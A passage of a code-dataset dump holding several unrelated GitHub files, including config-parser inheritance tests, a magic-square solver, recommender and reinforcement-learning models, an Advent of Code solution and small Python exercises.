'config.ini' : '[DEFAULT]\\n%inherit = base%20%2b%20space.ini\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw'), 'word')\n\n #----------------------------------------------------------------------------\n def test_iniherit_sectionInherit(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw1=word\\n[s]\\nfoo=bar\\nx=y\\n',\n 'other.ini' : '[DEFAULT]\\nkw2=word\\n[so]\\nzig=zag\\n',\n 'config.ini' : '[s]\\n%inherit = base.ini other.ini[so]\\nx=z\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.items('DEFAULT'), [])\n self.assertEqual(sorted(parser.items('s')),\n sorted(dict(foo='bar', zig='zag', x='z').items()))\n\n #----------------------------------------------------------------------------\n def test_iniherit_interpolation(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '[app]\\noutput = %(tmpdir)s/var/result.log\\n',\n }.items()}\n parser = SafeConfigParser(\n defaults={'tmpdir': '/tmp'}, loader=ByteLoader(dict(files)))\n parser.read('config.ini')\n self.assertEqual(parser.get('app', 'output'), '/tmp/var/result.log')\n self.assertEqual(parser.get('app', 'output', raw=True), '%(tmpdir)s/var/result.log')\n\n #----------------------------------------------------------------------------\n def test_iniherit_invalidInterpolationValues(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '[logger]\\ntimefmt=%H:%M:%S\\n',\n }.items()}\n parser = SafeConfigParser(loader=ByteLoader(dict(files)))\n parser.read('config.ini')\n self.assertEqual(parser.items('DEFAULT'), [])\n self.assertEqual(parser.get('logger', 'timefmt', raw=True), '%H:%M:%S')\n\n #----------------------------------------------------------------------------\n def test_install_globally(self):\n from anki_killstreaks._vendor.iniherit.parser import CP\n from anki_killstreaks._vendor.iniherit.mixin import install_globally, uninstall_globally\n\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw = base-kw\\n',\n 'config.ini' : '[DEFAULT]\\n%inherit = base.ini\\n',\n }.items()}\n loader = ByteLoader(dict(files))\n\n def do_the_test():\n # first test that inheritance doesn't work\n parser = CP.ConfigParser()\n parser.loader = loader\n parser.readfp(loader.load('config.ini'))\n with self.assertRaises(CP.NoOptionError):\n parser.get('DEFAULT', 'kw')\n # then monkey-patch and test that inheritance does work\n install_globally()\n parser = CP.ConfigParser()\n parser.loader = loader\n parser.readfp(loader.load('config.ini'))\n self.assertEqual(parser.get('DEFAULT', 'kw'), 'base-kw')\n uninstall_globally()\n\n do_first_test = do_second_test = do_the_test\n do_first_test()\n do_second_test()\n\n #----------------------------------------------------------------------------\n def test_output_order_ascending(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[s1]\\ns1v = b1\\n[s2]\\ns2v = b2\\n[s3]\\ns3v = b3\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[s2]\\ns2v = o2',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n output = six.StringIO()\n parser.write(output)\n self.assertMultiLineEqual(\n output.getvalue(),\n '[s1]\\ns1v = b1\\n\\n[s2]\\ns2v = o2\\n\\n[s3]\\ns3v = b3\\n\\n')\n\n #----------------------------------------------------------------------------\n def test_output_order_descending(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[s3]\\ns3v = b3\\n[s2]\\ns2v = b2\\n[s1]\\ns1v = b1\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[s2]\\ns2v = o2',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n output = six.StringIO()\n parser.write(output)\n self.assertMultiLineEqual(\n output.getvalue(),\n '[s3]\\ns3v = b3\\n\\n[s2]\\ns2v = o2\\n\\n[s1]\\ns1v = b1\\n\\n')\n\n #----------------------------------------------------------------------------\n def test_interpolation_super_depth(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [DEFAULT]\n keys2 = base-vals\n # [loggers]\n # keys = root, authz\n # okeys = okeys-bVal\n ''',\n 'mid.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini ?no-such-ini.ini\n # key1 = val1\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = mid.ini\n # nkeys = %(SUPER:-nval0)s, eVal1\n keys2 = %(SUPER:-nval0)s, eVal1\n # [loggers]\n # keys = %(SUPER)s, authn\n # okeys = %(SUPER:-okeys-eDef)s, okeys-eVal\n # dkeys = %(SUPER:-dkeys-eDef)s, dkeys-eVal\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n\n # self.assertEqual(parser.get('loggers', 'keys'), 'root, authz, authn')\n # self.assertEqual(parser.get('loggers', 'okeys'), 'okeys-bVal, okeys-eVal')\n # self.assertEqual(parser.get('loggers', 'dkeys'), 'dkeys-eDef, dkeys-eVal')\n\n self.assertEqual(parser.get('DEFAULT', 'keys2'), 'base-vals, eVal1')\n\n # self.assertEqual(parser.get('DEFAULT', 'nkeys'), 'nval0, eVal1')\n # self.assertEqual(parser.get('DEFAULT', 'key1'), 'val1')\n\n #----------------------------------------------------------------------------\n def test_interpolation_super_breadth(self):\n from anki_killstreaks._vendor.iniherit import InterpolationMissingSuperError\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [loggers]\n keys = root, authz\n ''',\n 'adjust.ini' : '''\\\n [loggers]\n keys = %(SUPER)s, authn\n nkey = %(SUPER)s and boom!\n dkey = %(SUPER:-more)s or less\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini adjust.ini\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('loggers', 'keys'), 'root, authz, authn')\n self.assertEqual(parser.get('loggers', 'dkey'), 'more or less')\n with self.assertRaises(InterpolationMissingSuperError) as cm:\n parser.get('loggers', 'nkey')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [loggers]\n \\toption : nkey\n \\tkey : SUPER\n \\trawval : %(SUPER)s and boom!\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'nkey' in section 'loggers'\"\n \" contains an interpolation key 'SUPER' which is not a valid option name.\"\n \" Raw value: '%(SUPER)s and boom!'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n #----------------------------------------------------------------------------\n def test_interpolation_super_invalid(self):\n from anki_killstreaks._vendor.iniherit import InterpolationMissingSuperError\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [DEFAULT]\n key1 = val1\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini\n key2 = %(SUPER)s and boom!\n ''',\n }.items()}\n files = {k: textwrap.dedent(v) for k, v in files.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n with self.assertRaises(InterpolationMissingSuperError) as cm:\n parser.get('DEFAULT', 'key2')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [DEFAULT]\n \\toption : key2\n \\tkey : SUPER\n \\trawval : %(SUPER)s and boom!\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'key2' in section 'DEFAULT'\"\n \" contains an interpolation key 'SUPER' which is not a valid option name.\"\n \" Raw value: '%(SUPER)s and boom!'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n #----------------------------------------------------------------------------\n def test_interpolation_env(self):\n import os\n from six.moves.configparser import InterpolationDepthError\n from anki_killstreaks._vendor.iniherit import InterpolationMissingEnvError\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\\\n [section]\n key1 = %(ENV:INIHERIT_TEST_EXIST)s\n key2 = %(ENV:INIHERIT_TEST_EXIST:-default-value)s\n key3 = %(ENV:INIHERIT_TEST_NOEXIST)s\n key4 = %(ENV:INIHERIT_TEST_NOEXIST:-default-value)s\n key5 = %(ENV:INIHERIT_TEST_INFLOOP)s\n ''',\n }.items()}\n files = {k: textwrap.dedent(v) for k, v in files.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n # note: setting envvar's *after* reading to ensure that interpolation\n # occurs on-demand, i.e. lazy-eval\n os.environ.pop('INIHERIT_TEST_NOEXIST', None)\n os.environ['INIHERIT_TEST_EXIST'] = 'this-value'\n os.environ['INIHERIT_TEST_INFLOOP'] = '%(ENV:INIHERIT_TEST_INFLOOP)s'\n self.assertEqual(parser.get('section', 'key1'), 'this-value')\n self.assertEqual(parser.get('section', 'key2'), 'this-value')\n self.assertEqual(parser.get('section', 'key4'), 'default-value')\n with self.assertRaises(InterpolationMissingEnvError) as cm:\n parser.get('section', 'key3')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [section]\n \\toption : key3\n \\tkey : INIHERIT_TEST_NOEXIST\n \\trawval : %(ENV:INIHERIT_TEST_NOEXIST)s\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'key3' in section 'section'\"\n \" contains an interpolation key 'INIHERIT_TEST_NOEXIST'\"\n \" which is not a valid option name.\"\n \" Raw value: '%(ENV:INIHERIT_TEST_NOEXIST)s'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n with self.assertRaises(InterpolationDepthError) as cm:\n parser.get('section', 'key5')\n if six.PY2:\n err = textwrap.dedent('''\\\n Value interpolation too deeply recursive:\n \\tsection: [section]\n \\toption : key5\n \\trawval : %(ENV:INIHERIT_TEST_INFLOOP)s\n ''')\n else:\n err = (\n \"Recursion limit exceeded in value substitution:\"\n \" option 'key5' in section 'section'\"\n \" contains an interpolation key which cannot be substituted in 10 steps.\"\n \" Raw value: '%(ENV:INIHERIT_TEST_INFLOOP)s'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n #----------------------------------------------------------------------------\n def test_cascading_env_interpolate(self):\n # test that if a key contains an interpolation of another key\n # can in turn interpolate an \"%(ENV:...)s\" style expansion.\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\n [DEFAULT]\n kw1 = %(kw2)s\n kw2 = %(ENV:UNDEFINED:-defval)s\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'defval')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'defval')\n\n #----------------------------------------------------------------------------\n def test_subclass_override(self):\n # test that subclasses that override `ConfigParser._interpolate`,\n # but that still directly call it, works...\n class SomeOtherConfigParser(ConfigParser):\n def _interpolate(self, section, option, rawval, vars):\n return ConfigParser._interpolate(self, section, option, rawval, vars)\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\n [DEFAULT]\n kw1 = %(kw2)s\n kw2 = %(ENV:SOMEVAL:-defval)s\n ''',\n }.items()}\n parser = SomeOtherConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'defval')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'defval')\n\n\n#------------------------------------------------------------------------------\n# end of $Id$\n# $ChangeLog$\n#------------------------------------------------------------------------------\n","repo_name":"jac241/anki_killstreaks","sub_path":"anki_killstreaks/_vendor/iniherit/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":18816,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"79"} +{"seq_id":"11497043326","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nsquares = []\nseed = (\n (8, 1, 6),\n (3, 5, 7),\n (4, 9, 2)\n)\n\ndef reflect(s):\n '''\n Returns a new square that is the reflected version of s.\n\n Reflects across the identity diagonal. Any sort of reflect works since we\n also rotate.\n\n >>> rotate(((1, 2, 3),\n (4, 5, 6),\n (7, 8, 9)))\n ((1, 4, 7), (2, 5, 8), (3, 6, 9))\n '''\n return tuple(zip(*s))\n\ndef rotate(s):\n '''\n Returns a new square that is s rotated 90 degrees clockwise.\n\n >>> rotate(((1, 2, 3),\n (4, 5, 6),\n (7, 8, 9)))\n ((7, 4, 1), (8, 5, 2), (9, 6, 3))\n '''\n return tuple(zip(*reversed(s)))\n\nfor _ in range(4):\n seed = rotate(seed)\n squares.append(seed)\nseed = reflect(seed)\nfor _ in range(4):\n seed = rotate(seed)\n squares.append(seed)\n\ndef squareDiff(a, b):\n '''\n Returns the sum of the absolute values of the differences between each item\n in a and b.\n '''\n return sum(abs(a[i][j] - b[i][j]) for i in range(3) for j in range(3))\n\n# Complete the formingMagicSquare function below.\ndef formingMagicSquare(s):\n '''\n This is an inelegant question. It seems to require preconstructing all magic\n squares ahead of time and comparing them.\n '''\n return min(squareDiff(square, s) for square in squares)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = []\n\n for _ in range(3):\n s.append(list(map(int, input().rstrip().split())))\n\n result = formingMagicSquare(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"linkenneth/hacker-rank","sub_path":"magic-square-forming/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21671026733","text":"import torch\nfrom torch import nn\nfrom REC.utils.enum_type import InputType\nfrom REC.model.basemodel import BaseModel\nimport numpy as np\nfrom torch.nn.init import xavier_normal_, constant_\nimport torch.nn.functional as F\n\n\n\nclass DVBPR(BaseModel):\n input_type = InputType.PAIR\n def __init__(self, config, dataload):\n super(DVBPR, self).__init__()\n \n self.dropout_prob = config['dropout_prob']\n self.embedding_size = config['embedding_size'] // 2\n \n self.device = config['device']\n \n self.user_num = dataload.user_num\n self.item_num = dataload.item_num\n # CNN for learned image features\n \n self.visual_encoder = CNNF(hidden_dim=self.embedding_size, dropout=self.dropout_prob) # CNN-F is a smaller CNN\n \n # Visual latent preference (theta)\n self.theta_users = nn.Embedding(self.user_num, self.embedding_size)\n\n # Latent factors (gamma)\n self.gamma_users = nn.Embedding(self.user_num, self.embedding_size)\n self.gamma_items = nn.Embedding(self.item_num, self.embedding_size)\n \n self.weight = torch.tensor([[1.0],[-1.0]]).to(self.device)\n # Random weight initialization\n self.reset_parameters()\n\n \n \n def reset_parameters(self):\n \"\"\" Restart network weights using a Xavier uniform distribution. \"\"\"\n if isinstance(self.visual_encoder, CNNF):\n self.visual_encoder.reset_parameters()\n nn.init.uniform_(self.theta_users.weight) # Visual factors (theta)\n nn.init.uniform_(self.gamma_users.weight) # Visual factors (theta)\n nn.init.uniform_(self.gamma_items.weight) # Visual factors (theta)\n \n \n def forward(self, inputs):\n user, item_id, item_modal = inputs\n embed_id_user = self.gamma_users(user).unsqueeze(1) \n embed_id_item = self.gamma_items(item_id) \n\n embed_modal_user = self.theta_users(user).unsqueeze(1)\n embed_modal_item = self.visual_encoder(item_modal).view(user.shape[0], -1, self.embedding_size) #[5,2,32]\n\n score = (embed_id_user * embed_id_item).sum(-1) + \\\n (embed_modal_user * embed_modal_item).sum(-1) \n \n output = score.view(-1,2) \n batch_loss = -torch.mean(torch.log(torch.sigmoid(torch.matmul(output, self.weight))))\n return batch_loss\n\n\n\n @torch.no_grad()\n def predict(self, user,item_feature): \n embed_id_user = self.gamma_users(user) \n embed_id_item = self.gamma_items.weight \n\n embed_modal_user = self.theta_users(user)\n \n score = torch.matmul(embed_id_user,embed_id_item.t()) + \\\n torch.matmul(embed_modal_user,item_feature.t()) \n return score\n\n @torch.no_grad()\n def compute_item(self, item):\n return self.visual_encoder(item)\n\n\n\n\n\n\n\n\n\n\n\n\nclass CNNF(nn.Module):\n \"\"\"CNN-F network\"\"\"\n def __init__(self, hidden_dim=2048, fc_dim=512, weights=None, dropout=0.5):\n super(CNNF, self).__init__()\n self.hidden_dim = hidden_dim\n\n if weights is None:\n weights = {\n # conv layers: ((c_in, c_out, stride (square)), custom stride)\n 'cnn': [([3, 64, 11], [1, 4]),\n ([64, 256, 5], None),\n ([256, 256, 3], None),\n ([256, 256, 3], None),\n ([256, 256, 3], None)],\n \n # fc layers: n_in, n_out\n 'fc': [[256*22*2, fc_dim], # original: 256*7*7 -> 4096\n [fc_dim, fc_dim],\n [fc_dim, self.hidden_dim]]\n }\n\n self.convs = nn.ModuleList([nn.Conv2d(*params, padding_mode='replicate', stride=stride if stride else 1)\n for params, stride in weights['cnn']])\n \n self.fcs = nn.ModuleList([nn.Linear(*params) for params in weights['fc']])\n self.maxpool2d = nn.MaxPool2d(2)\n self.maxpool_idxs = [True, True, False, False, True] # CNN layers to maxpool\n self.dropout = nn.Dropout(p=dropout) \n self.layer_params = weights\n\n def forward(self, x):\n x = torch.reshape(x, shape=[-1, 3, 224, 224])\n\n # convolutional layers\n for cnn_layer, apply_maxpool in zip(self.convs, self.maxpool_idxs):\n x = F.relu(cnn_layer(x))\n # notable difference: original TF implementation has \"SAME\" padding\n x = self.maxpool2d(x) if apply_maxpool else x\n\n # fully connected layers\n x = torch.reshape(x, shape=[-1, self.layer_params['fc'][0][0]])\n for fc_layer in self.fcs:\n x = F.relu(fc_layer(x))\n x = self.dropout(x)\n\n return x\n\n def reset_parameters(self):\n for conv in self.convs:\n nn.init.xavier_uniform_(conv.weight)\n for fc in self.fcs:\n nn.init.xavier_uniform_(fc.weight)","repo_name":"westlake-repl/PixelRec","sub_path":"code/REC/model/VisualModel/dvbpr.py","file_name":"dvbpr.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"} +{"seq_id":"73011098496","text":"t = 0\npoints = []\n\ndef setup():\n size(600,600)\n noStroke()\n\ndef draw():\n global t, points\n background(255)\n translate(width/2,height/2)\n x, y = harmonograph(t)\n #save location to points List\n points.append([x,y])\n #go through points list and draw lines between them\n for i,p in enumerate(points):\n stroke(0) #black\n if i < len(points) - 1:\n line(p[0],p[1],points[i+1][0],points[i+1][1])\n t += .1\n \ndef harmonograph(t):\n a1, a2, a3, a4 = 100, 100, 100, 100 #amplitudes\n f1, f2, f3, f4 = 3.01, 3, 3, 2 #frequencies\n p1, p2, p3, p4 = -PI/2, 0, -PI/16, 0 #phase shifts\n d1, d2, d3, d4 = 0.00085, 0.0065, 0 ,0 #decay constants\n x = a1*cos(f1*t + p1)*exp(-d1*t) + a3*cos(f3*t + p3)*exp(-d3*t) \n y = a2*sin(f2*t + p2)*exp(-d2*t) + a4*sin(f4*t + p4)*exp(-d4*t)\n fill(0) #black\n ellipse(x,y,5,5)\n return x, y\n \n \n","repo_name":"decoy0ctopus/Mathematics-Experiments-w-Python","sub_path":"Harmonograph/Harmonograph.pyde","file_name":"Harmonograph.pyde","file_ext":"pyde","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22574323354","text":"#%%import numpy as np\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nwriter = SummaryWriter()\nimport csv\n\nimport gym\nimport pybullet_envs.bullet as bul\n\nimport math\nimport time\nfrom td3_agent import ReplayBuffer, TD3Agent\nfrom collections import deque\n\n\nstart_timestep=1e4\n\nstd_noise=0.02\n\nenv = gym.make('Walker2DBulletEnv-v0')\nenv.render()\n\n# Set seeds\nseed = 12345\nenv.seed(seed)\ntorch.manual_seed(seed)\nnp.random.seed(seed)\n\nstate = env.reset()\nstate_dim = env.observation_space.shape[0]\naction_dim = env.action_space.shape[0] \nmax_action = float(env.action_space.high[0])\nthreshold = env.spec.reward_threshold\n\nprint('start_dim: ', state_dim, ', action_dim: ', action_dim)\nprint('max_action: ', max_action, ', threshold: ', threshold, ', std_noise: ', std_noise)\n\nagent = TD3Agent(state_dim, action_dim, max_action)\n\n# Twin Delayed Deep Deterministic (TD3) policy gradient algorithm\ndef td3_train(n_episodes=10000, print_env=10):\n\n scores_deque = deque(maxlen=10)\n scores_array = []\n avg_scores_array = [] \n best_score = -math.inf\n\n time_start = time.time() # Init start time\n replay_buf = ReplayBuffer() # Init ReplayBuffer\n \n timestep_after_last_save = 0\n total_timesteps = 0\n \n low = env.action_space.low\n high = env.action_space.high\n \n print(f'Low in action space: {low}, High: {high}, Action_dim: {action_dim}')\n \n for i_episode in range(1, n_episodes+1):\n \n timestep = 0\n total_reward = 0\n \n # Reset environment\n state = env.reset()\n done = False\n\n while done is False:\n \n # Select action randomly or according to policy\n if total_timesteps < start_timestep:\n action = env.action_space.sample()\n else:\n action = agent.select_action(np.array(state))\n if std_noise != 0: \n shift_action = np.random.normal(0, std_noise, size=action_dim)\n action = (action + shift_action).clip(low, high)\n \n # Perform action\n new_state, reward, done, _ = env.step(action) \n done_bool = 0 if timestep + 1 == env._max_episode_steps else float(done)\n total_reward += reward # full episode reward\n\n # Store every timestep in replay buffer\n replay_buf.add((state, new_state, action, reward, done_bool))\n state = new_state\n\n timestep += 1 \n total_timesteps += 1\n timestep_after_last_save += 1\n\n scores_deque.append(total_reward)\n scores_array.append(total_reward)\n\n avg_score = np.mean(scores_deque)\n avg_scores_array.append(avg_score)\n if total_reward > best_score:\n best_score = total_reward\n agent.save('Walker2D_3_std002', 'td3_best')\n\n # train_by_episode(time_start, i_episode) \n s = (int)(time.time() - time_start)\n if i_episode % print_env == 0 or (len(scores_deque) == 100 and avg_score > threshold):\n print('Ep. {}, Timestep {}, Ep.Timesteps {}, Score: {:.2f}, Avg.Score: {:.2f}, Best.Score: {:.2f}, Time: {:02}:{:02}:{:02} '\\\n .format(i_episode, total_timesteps, timestep, \\\n total_reward, avg_score, best_score, s//3600, s%3600//60, s%60)) \n\n agent.train(replay_buf, timestep)\n \n if avg_score >= threshold:\n print('Environment solved with Average Score: ', avg_score )\n\n # Write to tensorboard\n writer.add_scalar(\"average return\", total_reward, i_episode)\n\n return scores_array, avg_scores_array\n\nscores, avg_scores = td3_train()\n\nagent.save('Walker2D_3_std002', 'td3_last')\nwriter.flush()\nwriter.close()\n\nwith open('td3_scores_1000episodes.csv', 'w') as file:\n writer = csv.writer(file)\n writer.writerow(scores)\n\n#%%","repo_name":"OkYongChoi/reinforcement-learning","sub_path":"TD3/td3_train.py","file_name":"td3_train.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6272170156","text":"import cv2\nimport numpy as np\nimport os\n\n# -----------------------------------------------------------------\n# PVA-01\n# Script to extract symbols from a hand drawn raw image\n# the script needs to be run in the same directory as the raw image\n# Directory structure:\n# PVA-01\n# - Bilder\n# - raw-symbols.png\n# - squares\n# - symbols\n# - generate.py\n# -----------------------------------------------------------------\n\n# Load the image\nimg = cv2.imread(\"Bilder/raw-symbols.png\")\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# set size of the square\nsize = 100\n\n# set your name\nname = \"matthias.heimberg\"\n\n# path to store the extracted symbols\nsymbol_path = \"Bilder/symbols/\"\n# path to store the resized symbols (squares)\nsquare_path = \"Bilder/squares/\"\n\n# Threshold the image to a binary image\nret, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)\n\n# Find contours in the binary image\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n# Iterate through each contour and draw the bounding rectangle\nfor i, contour in enumerate(contours):\n [x, y, w, h] = cv2.boundingRect(contour)\n symbol = img[y:y + h, x:x + w]\n cv2.imwrite(f\"{symbol_path}{i:02d}.png\", symbol)\n\n# Load all symbols and put each in the middle of a square\nfor j, filename in enumerate(os.listdir(symbol_path)):\n prefix = '-' if j < 10 else 'x' if j < 20 else '+' if j < 30 else 'o' if j < 40 else '#'\n img = cv2.imread(f\"{symbol_path}{filename}\")\n h, w, _ = img.shape\n new_h, new_w = (size, int(w * (size / h))) if h > w else (int(h * (size / w)), size)\n symbol = cv2.resize(img, (new_w, new_h), cv2.INTER_AREA)\n h, w, _ = symbol.shape\n new_img = np.ones((size, size, 3), np.uint8) * 255\n start_x = int(size / 2 - w / 2)\n start_y = int(size / 2 - h / 2)\n name = filename[:-4]\n new_img[start_y:start_y + h, start_x:start_x + w] = symbol\n cv2.imwrite(f\"{square_path}{prefix}-{name}-.png\", new_img)\n","repo_name":"heimberg/male-project","sub_path":"PVA-01/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39705066590","text":"#!/usr/bin/env python3\nimport fileinput\n\n\ndef find(iterable, pred):\n return next(filter(pred, iterable), None)\n\n\ndef length(l):\n return lambda s: len(s) == l\n\n\ndef strsort(str):\n return \"\".join(sorted(str))\n\n\ndef get_mapping(pattern):\n mapping = {\n 1: find(pattern, length(2)),\n 4: find(pattern, length(4)),\n 7: find(pattern, length(3)),\n 8: find(pattern, length(7)),\n }\n mapping[9] = find(\n pattern, lambda x: len(x) == 6 and set(x).issuperset(set(mapping[4]))\n )\n mapping[0] = find(\n pattern,\n lambda x: len(x) == 6\n and set(x).issuperset(set(mapping[7]))\n and x not in mapping.values(),\n )\n mapping[3] = find(\n pattern,\n lambda x: len(x) == 5\n and len(set(x).intersection(set(mapping[7]))) == 3\n and x not in mapping.values(),\n )\n mapping[6] = find(\n pattern,\n lambda x: len(x) == 6\n and len(set(x).intersection(set(mapping[0]))) == 5\n and x not in mapping.values(),\n )\n mapping[5] = find(\n pattern,\n lambda x: len(x) == 5\n and len(set(x).intersection(set(mapping[9]))) == 5\n and x not in mapping.values(),\n )\n mapping[2] = find(pattern, lambda x: x not in mapping.values())\n return {strsort(v): k for k, v in mapping.items()}\n\n\ndef part1(data):\n unique = set([2, 3, 4, 7])\n return sum(len(digit) in unique for (_, output) in data for digit in output)\n\n\ndef part2(data):\n result = []\n for (pattern, output) in data:\n mapping = get_mapping(pattern)\n result.append(\n sum(\n mapping[strsort(val)] * pow(10, idx)\n for idx, val in enumerate(reversed(output))\n )\n )\n return sum(result)\n\n\ndef main():\n data = [\n tuple(part.split() for part in line.split(\"|\")) for line in fileinput.input()\n ]\n print(part1(data))\n print(part2(data))\n\n\nmain()\n","repo_name":"lagerfeuer/AdventOfCode2021","sub_path":"day08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8999356885","text":"import sys\nsys.stdin = open('미궁.txt', 'r')\n\n#N x M 행렬, 1은 갈수있고 0은 못감. 1,1에서 N,M으로 갈때 최소 몇칸 이동해야하는가?? 상하좌우 이동만 된다.\n\nlaby = []\nN, M = map(int, input().split())\n\nfor i in range(N):\n laby.append(list(map(int,input())))\n\n\n# dx = [0,0,-1,1]\n# dy = [1,-1,0,0] #상하좌우 인줄알았는데 우좌상하였음....\ndc = [0,0,-1,1]\ndr = [-1,1,0,0] #상하좌우\n\nx = 0\ny = 0\ncount = 0\nb = set() # 되돌아오는거 방지\n\n\nfor i in range(N):\n for j in range(M):\n for k in range(4):\n nx = i + dr[k]\n ny = j + dc[k]\n n_ = (nx, ny)\n if n_ not in b:\n b.add(n_)\n else:\n continue\n \n if 0 <= nx < N and 0 <= ny < N and laby[nx][ny] == 1:\n count += 1\n i = nx\n j = ny\n \nprint(count)\n","repo_name":"Raven712/TIL","sub_path":"6주/28일(회전, 브루트포스, 델타탐색)/s1_bj2178_labyrinth.py","file_name":"s1_bj2178_labyrinth.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11896976392","text":"\"\"\"create account table\n\nRevision ID: 26979f2a8154\nRevises: \nCreate Date: 2021-08-25 13:43:56.270385+00:00\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '26979f2a8154'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'app_user',\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('first_name', sa.Unicode(50)),\n sa.Column('last_name', sa.Unicode(50)),\n sa.Column('address', sa.Unicode(200)),\n sa.Column('email', sa.String(50), nullable=False),\n )\n\n\ndef downgrade():\n op.drop_table('app_user')\n","repo_name":"Gusakovskiy/goit_python_web","sub_path":"module_9/simple_project/alembic/versions/26979f2a8154_init.py","file_name":"26979f2a8154_init.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"22943886409","text":"class Coordinate(object):\n def __init__(self, x, y):\n # Sets the x and y coordinates of the object\n self.x = x\n self.y = y\n\n def distance(self, other):\n # Returns the euclidean distance between two points\n x_diff_sq = (self.x - other.x)**2\n y_diff_sq = (self.y - other.y)**2\n return (x_diff_sq + y_diff_sq)**0.5\n\n def __str__(self):\n # Special operator __str__ to return a string representaiton to the user when print(c) is called\n return \"<{}, {}>\".format(self.x, self.y)\n\nc = Coordinate(3,4)\norigin = Coordinate(0,0)\n\nprint(c.distance(origin))\nprint(c)\nprint(type(c))\n","repo_name":"imharrisonking/MIT-OpenCourseWare","sub_path":"MIT-6.0001/week8-OOP/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 